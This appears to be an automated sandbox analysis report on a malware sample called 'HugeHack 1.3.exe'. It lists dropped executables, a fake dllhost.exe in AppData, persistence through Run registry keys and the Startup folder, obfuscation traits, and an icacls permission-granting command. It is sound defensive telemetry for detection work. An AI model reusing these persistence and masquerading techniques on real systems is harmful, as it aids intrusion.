Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe

Static file information: File size 6767104 > 1048576

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x672000

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: Payload.exe.0.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: dllhost.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: ClickMe.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: c382eb151c59bd833b24120723eac541.exe.16.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

PE file contains an invalid checksum

Source: dllhost.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x115b5
Source: c382eb151c59bd833b24120723eac541.exe.16.dr	Static PE information: real checksum: 0x0 should be: 0x115b5
Source: HugeHack 1.3.exe.bin.exe	Static PE information: real checksum: 0xb6dd should be: 0x682a2e
Source: Payload.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x115b5
Source: webhook.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xd23c1
Source: ClickMe.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x115b5

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E829A8 pushfd ; ret	2_2_00E829EE
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E82CA1 pushfd ; ret	2_2_00E82D1A
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_065B5D10 push es; ret	3_2_065B5D20
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F92EA0 pushfd ; retf	3_2_07F92EA1
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F9E17F push esp; ret	3_2_07F9E193
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15200738 push eax; ret	5_3_15200739
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15208302 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15208302 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520BB63 push eax; ret	5_3_1520BB79
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520BB63 push eax; ret	5_3_1520BB79
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15204970 push eax; ret	5_3_15204971
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15204970 push eax; ret	5_3_15204971
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15201D47 push eax; ret	5_3_15201E21
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C9B8 push eax; ret	5_3_1520C9B9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C9B8 push eax; ret	5_3_1520C9B9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152085F0 push eax; ret	5_3_152085F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152085F0 push eax; ret	5_3_152085F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C3F8 push eax; retf	5_3_1520C3FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520C3F8 push eax; retf	5_3_1520C3FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_15202BC0 push eax; ret	5_3_15202BC1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520ADD0 push eax; ret	5_3_1520ADD1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520ADD0 push eax; ret	5_3_1520ADD1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_151FD610 push eax; ret	5_3_151FD611
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520AA4C push eax; retf	5_3_1520AA4D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520AA4C push eax; retf	5_3_1520AA4D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_151FF8BF push eax; ret	5_3_151FF999
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152082F0 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152082F0 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152058F0 push eax; ret	5_3_152058F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152058F0 push eax; ret	5_3_152058F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152CCAA6 push esp; retf	5_3_152CCAB5

Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'foONAXjG3I', 'sZWSGe5T9eymd', 'hCNSuhQpx', 'vdBMdA6DW', 'JtXWIGFkn', 'NsUOQ9nfG', 'memvMOjIl', 'qo4kGe9DR', 'n2ih4e3Jc'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'foONAXjG3I', 'sZWSGe5T9eymd', 'hCNSuhQpx', 'vdBMdA6DW', 'JtXWIGFkn', 'NsUOQ9nfG', 'memvMOjIl', 'qo4kGe9DR', 'n2ih4e3Jc'

Drops PE files

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\Payload.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	File created: C:\Users\user\AppData\Roaming\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dllhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	File created: C:\ClickMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\webhook.exe	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\c382eb151c59bd833b24120723eac541 f55ab6fb12b43f7934c631eabc315fb4

Uses cacls to modify the permissions of files

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
